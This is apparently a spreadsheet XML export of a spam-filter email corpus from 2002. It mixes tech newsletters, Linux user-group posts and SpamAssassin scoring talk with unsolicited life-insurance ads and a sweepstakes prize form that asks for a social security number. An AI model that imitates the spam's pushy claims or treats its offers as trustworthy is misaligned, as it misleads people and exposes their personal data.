 /Click?q=3D86-8fH1QCJonnkOBRzSjaeTldfVpf4R"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rl_login?email=3Dqqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D9b-7-wFrkI=
 01-XWd1epIp_ntlyl0U4hTsRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3Db0-NZmfQQJr-S9Xef6dxQMKtNX8PQiR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc5-8BcDQzOaF=
 -czAJ_zSROUJEymxqPR"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href=3D"http://clickthru.online.com/Click?q=3Dda-dT8jQUPq=
 _no59sjbjsMVKpv3DxnR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Def-04uYQmkHvFV_1BKqBxDV=
 AmoBameR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D04-k9W0IFQXFQWZUdA98BbBL7kOi_yR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D19-BLe0I2rXOrS=
 MMmlKMZ2Fz8IR7XlR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D2f-hYaFIqnzAabljf5P26D_8gaZjMeR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D44-9nxfIZUtYM2hh7gEMLKlXBDgnVsR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53oIEnthMngw3YlpW-B_=
 KMqztFR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D6e-2aYjIyES2bZIfb9QA5K-fxuEL59R" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D83-U-BXQYJ=
 7lF1q8ghtuoAABMMPZ9rR"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NL=3De501-01&amp;ISSUE=3D2002-07-10" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D98-F=
 TtO-Wz561wnRdZcPOtuqPuNnsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: O'Reilly Conference Newsletter Update - 071902e
</t>
  </si>
  <si>
    <t xml:space="preserve">O'Reilly Open Source Convention
 -From the Frontiers of Research to the Heart of the Enterprise
 Sheraton San Diego Hotel and Marina
 July 22-26, 2002 -- San Diego, CA
 http://conferences.oreillynet.com/os2002/?CMP=EM4907
 O'REILLY CONFERENCE NEWSLETTER UPDATE - 071902e
  -Conference News - One-Day Pass Offer
  -Conference Highlights - Bruce Sterling on Open Source
  -See &amp; Do - Camping Out at Kid's World
  -OSCON Tracks - It's not just about Perl, you know.
  -Conference Details - Keynotes
 "In the tradition of O'Reilly books, their conferences
 get past the fluff and hype of other conferences and
 home in directly on the meat of the technology."
 -- Jason Hall from Plug, the Provo area Linux Users Group
 ***
 CONFERENCE NEWS
 ----------------------------------------------
 ONE DAY PASS ADDED TO CONFERENCE
 If you can't swing the whole conference, but can't bear to miss
 that one session or keynote presentation, pick up a day pass,
 available for July 24, 25, or 26.
 The cost of the one day pass is $400. Please visit:
 http://conferences.oreillynet.com/os2002/?CMP=EM4907
 ----------------------------------------------
 Check out this year's program for a look into the future of
 open source software. Register Today!
 http://conferences.oreillynet.com/os2002/?CMP=EM4907
 ***
 OSCON2002 HIGHLIGHTS
 Bruce Sterling, author, journalist, editor, critic, presents
 A Contrarian Position on Open Source, Friday, July 26,
 11:30am - 12:15pm in Sea Breeze II.
 Sterling is the author of several science fiction novels including
 Involution Ocean, The Artificial Kid, Schismatrix, Islands in the
 Net, and Heavy Weather. He edited the collection Mirrorshades, the
 definitive document of the cyberpunk movement, and co-authored
 the novel The Difference Engine with William Gibson. He writes a
 critical column for Science Fiction Eye and a popular-science
 column for The Magazine of Fantasy and Science Fiction.
 His non-fiction book The Hacker Crackdown describes the law
 enforcement and computer-crime activities that led to the start
 of the Electronic Frontier Foundation in 1990.
 /==========================================================\
 Convention Newsletter Sponsored by InfoWorld
 InfoWorld's Next-Generation Conference
 Web Services II:  The Applications, September 18 - 20, 2002
 You have heard the promise.  Now hear the reality. InfoWorld's
 editors invite you to take a hard look at how Web Services'
 technology is affecting enterprise applications. Hear both
 challenges and success stories from those IT executives who
 are embracing Web services and from the leading companies
 whose products are fueling this new era of enterprise computing.
 Register before July 31 and save $300. Use priority code P062405.
 www.infoworld.com/nextgen
 \==========================================================/
 ***
 SEE &amp; DO
 http://conferences.oreillynet.com/pub/w/15/see_do.html
 - Camping out at "Kid's World"
 Back again by popular demand, Kid's World is available Monday
 through Thursday providing exceptional daycare for your young
 ones. Register now to ensure that your children don't miss out
 on the fun.
 http://conferences.oreillynet.com/pub/w/15/kids_world.html
 ***
 OSCON FEATURED TRACKS
 http://conferences.oreillynet.com/pub/w/15/tutorials.html
 http://conferences.oreillynet.com/pub/w/15/sessions.html
   -Python, with an emphasis on Zope
   -Apache Web Server, specifically 2.0, modules, configuration,
    and performance tuning
   -Java, featuring Jakarta, Jserv, Ant, and Jboss
   -Operating Systems: Linux, FreeBSD, OpenBSD, OS X
   -Databases, focusing on MySQL, PostgreSQL, Redhat B, SAPDB,
    Berkeley DB
   -Emerging topics, gaming, shared source, government projects
 ***
 CONFERENCE DETAILS
 -Keynote Speakers
 Freeing Culture
 Lawrence Lessig, Stanford Law School
 http://conferences.oreillynet.com/cs/os2002/view/e_sess/3027
 The Free Software Movement: Where All This Started
 Richard M. Stallman (representing the Free Software Movement),
 Free Software Foundation
 http://conferences.oreillynet.com/cs/os2002/view/e_sess/3047
 Hacking the Genome: Open Source in Bioinformatics
 Ewan Birney, European Bioinformatics Institute
 http://conferences.oreillynet.com/cs/os2002/view/e_sess/2389
 Evolution in ActionJim Kent,
 UC Santa Cruz Genome Bioinformatics Group
 http://conferences.oreillynet.com/cs/os2002/view/e_sess/2586
 The Changing Relationship Between Business and Developers
 Paul Pangaro, Ph.D., Sun Microsystems, Inc., Elaine B.
 Coleman, Ph.D., Sun
 https://conferences.oreillynet.com/cs/os2002/view/e_sess/3178
 Challenges of Open Source in Visual Effects
 Milton Ngan, Weta Digital Ltd
 https://conferences.oreillynet.com/cs/os2002/view/e_sess/3118
 For more details on our keynote, tutorial, and session
 speakers, please visit:
 http://conferences.oreillynet.com/os2002/?CMP=EM4907
 ***
 PLATINUM SPONSORS
 Apple Computer
 Active State
 Sun Microsystems
 For information regarding exhibition or sponsorship
 opportunities the convention, contact Andrew Calvo at
 707-827-7176, or andrewc@oreilly.com.
 ---------------------------------------------------------------------
 If you want to cancel an O'Reilly newsletter subscription, go
 to http://elists.oreilly.com/ and de-select any newsletters you
 no longer wish to receive. For assistance, email help@oreillynet.com
 ---------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: C++ and C Mailing Lists for Beginners and Advanced
</t>
  </si>
  <si>
    <t xml:space="preserve">David Neary stated the following:
 &gt; 
 &gt; SoloCDM wrote:
 &gt; 
 &gt; &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners
 &gt; &gt; and Advanced programmers?
 &gt; 
 &gt; Try the following newsgroups - Beginners: news:comp.lang.learn.c-c++
 I tried news:comp.lang.learn.c-c++ and it wouldn't work.  Is there a
 typo?
 &gt; More advanced: news:comp.lang.c news:comp.lang.c++
 &gt; news:comp.lang.c.moderated
 &gt; 
 &gt; Also, you should keep a bookmark pointing at the comp.lang.c FAQ at
 &gt; http://www.eskimo.com/~scs/C-faq/top.html
 &gt; 
 &gt; For tutorials, the guy who maintains the clc FAQ (Steve Summit) has
 &gt; a tutorial - http://www.eskimo.com/~scs/cclass/notes/top.html Also
 &gt; you could have a look at the excercises he poses - all linked from
 &gt; http://www.eskimo.com/~scs/cclass/cclass.html
 &gt; 
 &gt; For C++, I would guess that the comp.lang.c++ FAQ is a good place to
 &gt; start - they're likely to have links to suggested reading material.
 &gt; 
 &gt; If you're going to do any amount of C programming, you should
 &gt; think about getting K&amp;R2 (The C programming language, 2nd edition,
 &gt; by Kernighan and Ritchie), for C++ the equivalent book is
 &gt; Stroustrup. Although the C++ book is a lot bigger :)
 -- 
 Note: When you reply to this message, please include the mailing
       list and/or newsgroup address and my email address in To:
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Lowest life insurance rates available!                                                   irloq
</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! http://www.takemetothesavings.com/termlife/ 
  Representing quality nationwide carriers. Act now!
  ---------------------------------------
  To unsubscribe, go to: 
  http://www.takemetothesavings.com/stopthemailplease/
  Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] CORRECTION - How to copy some files
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 16:15:49 +0100
   | From: Brian Foster &lt;blf@utvinternet.ie&gt;
   |[ ... ]
   |  the issue here is tar(1) (and cpio(1)) archives always
   |  contain the data for each name of a hard link.  [ ... ]
  ARRGGGHHHH!!!!!
  profuse apologies, the wrong version of my reply was posted
  (blame it on being late for the pub).  ;-(
  the above is almost pure B*S* --- I got my `tar's and `cpio's
  confused.  what I said _is_ correct, but for cpio(1) archives;
  tar(1) archives do _not_ replicate the data for hard links.
  I spotted this confusion on my part before I posted my reply,
  and re-wrote it to be more correct, yet somehow the wrong
  version got sent anyways.  ARRGGGHHHH!!!!!  ;-(  ;-(  ;-(
  anyways, GNU `cpio -p' does not do spurious reads or writes.
  GNU `tar cf - ... | tar xf - ...' also does not, albeit each
  `tar' both reads and writes the data.  hence, there is twice
  (not thrice!) the I/O of `cpio -p', maybe an issue for c.60Gb.
  using strace(1), I've verified my claim GNU `cpio -p' does
  not do spurious reads or writes, i.e. it link(2)s.  but having
  just come back from the pub, perhaps this should also be taken
  with extra skepticism ......   ;-\ 
 sorry.  cheers!
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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Subject: Are your loved ones provided for?...               ZJGU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</si>
  <si>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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://www.marketing-leader.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 srdjan_lidija
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Malcolm in the Middle Sweepstakes Prize Notification
</t>
  </si>
  <si>
    <t xml:space="preserve">May 7, 2002
 Dear rod-3ds@arsecandle.org:
 Congratulations!  On behalf of Frito-Lay, Inc., we are pleased to advise you
  that you've won Fourth Prize in the 3D's(R) Malcolm in the Middle(TM)
  Sweepstakes.   Fourth Prize consists of 1 manufacturer's coupon redeemable at
  participating retailers for 1 free bag of 3D's(R) brand snacks (up to 7 oz.
  size), with an approximate retail value of $2.59 and an expiration date of
  12/31/02.
 Follow these instructions to claim your prize:
 1.	Print out this email message.
 2.	Complete ALL of the information requested.  Print clearly and legibly.  Sign
  where indicated.
 3.	If you are under 18 or otherwise under the legal age of majority in your
  state, your parent or legal guardian must co-sign where indicated below.
 4.	Mail the completed and signed form to:  3D's(R) Malcolm in the Middle(TM)
  Sweepstakes, Redemption Center, PO Box 1520, Elmhurst IL 60126.  WE MUST
  RECEIVE THIS FORM NO LATER THAN MAY 28, 2002 IN ORDER TO SEND YOU THE PRIZE.
 PLEASE DO NOT ATTEMPT TO REPLY TO THIS EMAIL.  THE ONLY WAY TO CLAIM THE PRIZE
  IS TO FOLLOW THE INSTRUCTIONS ABOVE.  YOUR PRIZE WILL BE MAILED TO YOU WITHIN 6
  TO 8 WEEKS OF RECEIPT OF THIS FORM.
 Once again, on behalf of Frito-Lay, Inc., congratulations and thank you for
  participating in the Game.
 Sincerely,
 Game Security Services
 PRIZE ACCEPTANCE/RELEASE AND INDEMNIFICATION FORM
 3D's(R) Malcolm in the Middle(TM) Sweepstakes
 1.	My social security number is:  _______________________________
 2.	My date of birth is:   _______________________________________
 3.	My telephone number is:   __________________________________
 4.	My home address is:   _____________________________________
 			      _____________________________________
 5.	My email address is:   _____________________________________
 6.	I am a legal resident of the State of:   _________________________
 7.	I am above the legal age of majority in my state of residence or my parent or
  legal guardian has co-signed below.
 8.	I represent that I (1) have fully complied with all of the Official Rules of
  the Sweepstakes, and (2) have not committed any fraud or deception in
  participating in the Sweepstakes or in accepting the Prize.
 9.	By accepting the prize, I (and my parent/legal guardian if I am a minor)
  agree to release Frito-Lay, Inc. ("Sponsor"), FOX Broadcasting Company, 20th
  Century FOX Television, Regency Entertainment, their respective parent,
  subsidiary or affiliated companies, distributors, printing suppliers for this
  promotion, advertising, fulfillment, judging or promotion agencies,
  participating retailers, and all of their respective officers, directors,
  employees, representatives and agents from any liability for, and to hold them
  harmless against, any liability for injuries, losses or damages of any kind to
  persons or property resulting in whole or in part, directly or indirectly, from
  participation in the sweepstakes or acceptance, possession, misuse or use of
  any prize. 
 Name [print full name]:	_______________________________
 Signature:		_______________________________
 Date:			_______________________________
 IF WINNER IS A MINOR IN HIS OR HER STATE OF RESIDENCE, WINNER'S PARENT OR LEGAL
  GUARDIAN MUST COMPLETE THE INFORMATION BELOW: 
 I am the parent or legal guardian of the winner who has signed the foregoing
  Release. I AGREE TO THE TERMS OF THE RELEASE AND CONSENT TO THE ACCEPTANCE OF
  THE PRIZE ON THE WINNER'S BEHALF.
 Parent/Guardian's Name [print full name]:	_______________________________
 Parent/Guardian's Signature:			_______________________________
 Date:						_______________________________
 2002 OFFICIAL RULES
 3D's(R) Malcolm in the Middle(TM) Sweepstakes
 OPEN ONLY TO LEGAL U.S. RESIDENTS LOCATED IN THE U.S. AT THE TIME OF ENTRY. VOID
  ELSEWHERE AND WHEREVER PROHIBITED BY LAW, INCLUDING BUT NOT LIMITED TO,
  FLORIDA, PUERTO RICO, U.S. VIRGIN ISLANDS AND U.S. MILITARY INSTALLATIONS
  LOCATED IN A FOREIGN COUNTRY.
 NO PURCHASE NECESSARY. PURCHASE DOES NOT IMPROVE CHANCE OF WINNING. MANY WILL
  ENTER. FEW WILL WIN. ODDS DEPEND ON NUMBER OF ENTRIES RECEIVED.
 1. ELIGIBILITY: Open only to legal U.S. residents located in the U.S. at the
  time of entry, excluding residents of Florida, Puerto Rico, the U.S. Virgin
  Islands and U.S. military installations located in a foreign country, who had
  online access on or before 1/26/02. Employees, contractors, directors and
  officers of Frito-Lay, Inc. ("Sponsor"), FOX Broadcasting Company, 20th Century
  FOX Television, Regency Entertainment, their respective parent, subsidiary and
  affiliated companies, distributors, printing suppliers for this promotion,
  advertising, fulfillment, judging and promotion agencies (collectively,
  "Promotion Parties"), and their immediate family members and those living in
  their same households are not eligible.
 2. TO ENTER: Beginning 12:00:01 a.m. E.T. 1/27/02, log on to www.3DsFun.com and
  click on the link on the home page to locate the official entry form. Follow
  on-screen directions to properly complete an entry form and send it
  electronically by 11:59:59 p.m. E.T. 2/11/02. In order for entry to be valid,
  entrants must click on the "I accept" button on the web site. All entries must
  be received no later than 11:59:59 p.m. E.T. on 2/13/02. LIMIT ONE ENTRY PER
  PERSON AND/OR E-MAIL ADDRESS. SUBSEQUENT ENTRIES WILL BE DISQUALIFIED.
  Promotion Parties assume no responsibility for lost, late, misdirected, stolen,
  undelivered, garbled, damaged, or incomplete entries, or for any computer,
  online, telephone or technical malfunctions that may occur. Promotion Parties
  also assume no responsibility for any technical problems in connection with
  transmission or receipt of online entries including faulty electronic data
  transmission, traffic congestion on the Internet or on the web site, hardware
  or software error, equipment failure or malfunction, or other online
  communications problems. In the event of a dispute regarding the identity of
  the person submitting an online entry, entries will be declared made by the
  authorized account holder of the e-mail address submitted at the time of entry.
  "Authorized account holder" is defined as the natural person who is assigned to
  an e-mail address by an Internet Access provider, online service provider, or
  other organization (e.g., business, educational institution, etc.) responsible
  for assigning e-mail addresses for the domain associated with the submitted
  e-mail address. All entries become the property of Sponsor and will not be
  returned to entrant. Automated entries (including but not limited to entries
  made using any script, macro, bot, or sweepstakes service) and facsimiles are
  not allowed. Potential winner may be requested to provide Sponsor with proof
  that the potential winner is the authorized account holder of the e-mail
  address associated with the winning entry.
 3. WINNER SELECTION: Winners will be selected in a random drawing to take place
  on or about 2/28/02 by an independent judging organization, the judge, whose
  decisions are final and binding on all matters related to the sweepstakes. Odds
  of winning depend on the number of eligible entries received. Winners will be
  notified by e-mail. If any prize or correspondence (including e-mail) regarding
  any prize is returned as non-deliverable, prize may be forfeited and an
  alternate winner selected.  Winners (or winner's parent or legal guardian, if
  winner is a minor) and Grand Prize winner's travel companions (or companion's
  parent or legal guardian for any companion who is a minor) will be required to
  complete, sign and return either a Prize Acceptance/Release and Indemnification
  form or an Affidavit of Eligibility/Liability Release (as directed by Sponsor),
  and, where lawful, a Publicity Release within twenty-one (21) days of winners'
  receipt of documents via e-mail or prize may be forfeited. Grand prize winner
  (or winner's parent or legal guardian, if winner is a minor) and winner's
  travel companions will also be required to complete, sign and return a set
  visit release together with completed I-9 and W-4 forms in order to visit the
  set of Malcolm in the Middle(TM) as described below in paragraph 4. Prizes won
  by minors will be awarded to a parent or legal guardian who must sign all
  required documents.
 4. PRIZES: ONE (1) GRAND PRIZE: One trip for winner and 3 travel companions of
  winner's choosing to Los Angeles, CA to be completed on or before 12/31/02.
  Trip is for 4 persons but can include up to 8 persons under the following
  conditions: Among winner and the 3 selected travel companions, each traveler
  who is a minor in his/her state of residence must be accompanied by a parent or
  legal guardian of such minor at all times; Sponsor will provide trip
  accommodations for one parent or legal guardian to accompany him/her. Trip
  includes round-trip coach air transportation from a major gateway airport near
  winner's residence within the U.S.; 3 days/2 nights double occupancy standard
  hotel accommodations in the Los Angeles, CA metropolitan area (airport, carrier
  and hotel to be selected by Sponsor); accompanied admission to the set of FOX's
  Malcolm in the Middle(TM) ("MIM") during a non-filming period selected by FOX
  to meet Frankie Muniz; and ground transportation between the California airport
  and hotel, and between the hotel and the MIM set. Grand Prize winner will also
  receive a check for $2,500, 1 MIM script autographed by Frankie Muniz, one
  MIM/3D's(R) brand snacks VIP pack (including 1 backpack, 1 book, 1 hat, 1
  t-shirt, and 1 case consisting of fifteen 7 oz. bags of RUFFLES(R) 3D's(R)
  brand Maximum Cheddar flavored snacks). Approximate Retail Value ("ARV"):
  Between $7,500 and $15,000, depending on winner's point of travel origin and
  how many persons (up to 8) take the trip. All meals, gratuities, and other
  expenses associated with prize trip not specifically mentioned in these rules
  are the winner's sole responsibility. All travel must be taken by the date
  specified; no alternative travel dates are available. Winner, travel
  companions, and any necessary parent(s)/legal guardian(s) (the "travel party")
  must travel on same itinerary. In the event that circumstances prevent the
  travel party from being able to attend the set visit or meet Frankie Muniz, or
  limit this portion of the Grand Prize in any way, the winner agrees that the
  Promotion Parties shall have no obligations other than to deliver the remainder
  of the Grand Prize. FIVE (5) FIRST PRIZES: Manufacturer's coupons redeemable at
  participating retailers for 52 free 7 oz. bags of any 3D'S(R) brand snacks
  (with a retail value up to $2.59). ARV: $135. TEN (10) SECOND PRIZES: One
  MIM/3D's(R) brand snacks VIP pack (including 1 backpack, 1 book, 1 hat, ,1
  t-shirt, and 1 case consisting of fifteen 7 oz. bags of RUFFLES(R) 3D's(R)
  brand Maximum Cheddar flavored snacks). ARV: $100. TWENTY (20) THIRD PRIZES:
  One MIM t-shirt and one MIM hat. ARV: $30. 100 FOURTH PRIZES: One
  manufacturer's coupon redeemable at participating retailers for 1 free bag of
  3D's(R) brand snacks (up to 7 oz. size). ARV: $2.59. Free product coupons
  expire and must be redeemed by 12/31/02. No substitution, cash redemptions or
  transfer of prizes is permitted except at Sponsor's sole discretion. If a prize
  cannot be awarded for any reason, Sponsor reserves the right to substitute any
  prize with another prize of equal or greater value. Any portion of a prize not
  accepted by a winner shall be forfeited. All prizes will be awarded.
 5. GENERAL CONDITIONS: Sweepstakes is not to be used in connection with any form
  of gambling. Prizes will be awarded and/or delivered only to addresses within
  the United States. Prize winners are solely responsible for any taxes on
  Prizes. This sweepstakes is subject to all federal, state and local laws, and
  Grand Prize winner will receive an IRS Form 1099 for the approximate retail
  value of the prize. By participating, entrants (and their parent(s)/legal
  guardian(s) if entrants are minors) agree to these Official Rules, Sponsor's
  Privacy Policy (available at www.3DsFun.com) and to the decisions of the judge,
  which are final and binding in all respects. If for any reason the sweepstakes
  is not capable of running as planned; including infection by computer virus,
  bugs, tampering, unauthorized intervention, fraud, technical failures, or any
  other causes which corrupt or affect the administration, security, fairness,
  integrity or proper conduct of the sweepstakes, Sponsor reserves the right, at
  its sole discretion, to disqualify any individual who is responsible or who
  tampers with the entry process, and to cancel or terminate the sweepstakes and
  select the winners from all eligible entries received prior to the cancellation
  or termination. This sweepstakes is offered only in the United States and is
  governed by the laws of the state of Texas, with venue in Dallas County, Texas,
  and all claims must be resolved in the federal or state courts of Dallas
  County, Texas.
 6. LIMITATIONS OF LIABILITY AND RELEASE: By accepting prize, winners (and
  winners' parent(s)/legal guardian(s) if winners are minors) agree that the
  Promotion Parties, participating retailers, and all of their respective
  officers, directors, employees, representatives and agents will have no
  liability whatsoever for, and shall be held harmless by winners against, any
  liability for injuries, losses or damages of any kind to persons or property
  resulting in whole or in part, directly or indirectly, from participation in
  the sweepstakes or acceptance, possession, misuse or use of any prize. Except
  if winners are residents of TN or where prohibited by law, winners (and
  winners' parent(s)/legal guardian(s) if winners are minors) grant (and agree to
  confirm this grant in writing, if requested) permission for Sponsor and those
  acting under its authority to use his/her name, photograph, voice and/or
  likeness, for advertising and/or publicity purposes without additional
  compensation.
 7. WINNERS' LIST: For a list of winners of prizes valued over $25, mail a
  self-addressed, stamped envelope to be postmarked by 2/11/02 and received by
  2/18/02 to: Malcolm in the Middle(TM) Sweepstakes, Winners' List Requests, P.O.
  Box 1518, Elmhurst, IL 60126.
 8. SPONSOR: Frito-Lay, Inc., 7701 Legacy Drive, Plano, TX 75024-4099.
 (c)2002. Frito-Lay, Inc. All rights reserved.
 Malcolm in the Middle(TM) and (c)2002 Twentieth Century Fox Film Corporation,
  Regency Entertainment (USA) Inc. and Monarchy Enterprises S.a.r.l. All rights
  reserved.
 (c)2002. FOX BROADCASTING COMPANY
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; MSG_ID_ADDED_BY_MTA   (4.0 points)
 &gt; INVALID_MSGID         (1.8 points) 
 &gt; MSG_ID_ADDED_BY_MTA_2 (1.6 points)
 Here are the new scores in the 2.40 branch (they may change, but they
 are better than before).
 score INVALID_MSGID                  1.226
 score MSG_ID_ADDED_BY_MTA            1.696
 score MSG_ID_ADDED_BY_MTA_2          0.532
 Total of 3.5 which is better than 7.4, I suppose.
 If they fixed their MSGID, it would help.  I suppose we could allow
 comments without hurting spam detection too much, but I'm reluctant
 (it's pretty bizarre to put a comment after the Message-ID header).
 Can you open a bugzilla ticket for this one?
 Dan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</si>
  <si>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Kanu at the double
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357898,215/
 Date: 2002-09-29T00:39:56+01:00
 *Football:* Kolo Toure was among the goals as Arsenal gave Leeds a good hiding 
 at Elland Road.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rapid immune reaction key to staving off AIDS
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8616191,1440/
 Date: Not supplied
 The killer T cells of HIV patients who stay healthy for years replicate 
 unusually rapidly, researchers discover - better treatments may result
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] cdrecord + 2.4.19 = hard-lock
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 I've run into a fairly intractable (for me) problem, and was wondering
 if anybody could give me pointers on how to deal with it.
 I am running Debian Woody on a Pentium III IDE based system.
 I have a Ricoh 7083a ide cd rewriter, which I use using cdrecord and the
 scsi over ide kernel modules.  I was running kernel 2.4.18 until
 probably last weekend when I noticed 2.4.19 was out.  Downloaded patch
 and installed new kernel with no real problems.  This morning I went to
 burn a CDROM, and the system locked hard.  Rebooting into 2.4.18 allowed
 cdburning to work fine.
 This problem is very reproducible (on my system at least).
 the cdrecord command I was using was
     cdrecord -v speed=4 blank=fast dev=0,1,0 -data bak.iso
 The blanking appears to go ok, but when it tries to write data, it just
 locks up the entire system (can't ping it from outside even).  AFAICS,
 the system just stops.  Hard reset is only way back in, and when it does
 reboot, I cannot see anything useful in any logfiles (/var/log/messages
 /var/log/kern.log /var/log/syslog, at any rate).
 cdrecord -scanbus works fine and reports the two pseudo-scsi devices (my
 cdr drive and my cdrw).
 The same lock occurs even if there is no blanking.
 I tried upgrading to 2.4.20-pre1-ac1 (on assumption that if there was a
 kernel issue it might have been fixed in these patches), but it gives
 the same error.  I also downloaded and compiled the source for
 cdrecord 1.1.10, and installed it instead of the debian package (i was
 wondering if maybe there was some compile option the packager had used
 which maybe would cause the problem), and still the problem persisted.
 Anyway, I'm completely stumped.  Google searching has not done me much
 good, and I'm a little bit lost.  What I'd like to know is
 a)  How to fix the problem ;-)
 b)  Is this likely to be an application or kernel problem?  The severity
     of the crash would make me suspect it is a kernel problem, but I'm
     not very knowledgeable on these things.
 c)  Should I post a description of this to the kernel mailing list? If
     this is an appropriate course of action, are there any tips (beyond
     the guidelines on kernel.org)?
 Like I said, I'm lost on this one, so any info is very gratefully
 received.
 mick
 -- 
 Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Baseline] Raising chickens the high-tech way
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From Egg to Drummies: 10 Weeks From Farm to Food
 By  Larry Barrett
 http://www.baselinemag.com/article2/0,3959,369038,00.asp
 My breasts have been halved, breaded and shipped to their current
 resting-place on a shelf in a supermarket in Denver. My legs should be
 arriving in Moscow any time now. All my feathers have been processed and are
 now being eaten by cattle somewhere in Texas. My blood and bones have been
 rendered for cat food, fertilizer and who-knows- what else. My wings have
 been seasoned with barbecue sauce and served with a side of ranch dressing
 and celery at some bar and grill in New York City. My feet? Well, they're
 headed to Asia where I'm told they're something of a delicacy.
 -----------
 So, a couple of things intrigued me about this byline, and its associated
 main article:
 And On the 47th Day, This Chicken Went to Market
 By  Debbie Gage
 http://www.baselinemag.com/article2/0,3959,367672,00.asp
 - I had no idea how much computer controls played into the raising of
 livestock
 - I had no idea how fast a chicken is raised these days
 It also strikes me that it will not be very long before livestock is
 genetically engineered to be dumber and meatier, and better adapted to
 living in industrial conditions.
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Sticker Courtesy
</t>
  </si>
  <si>
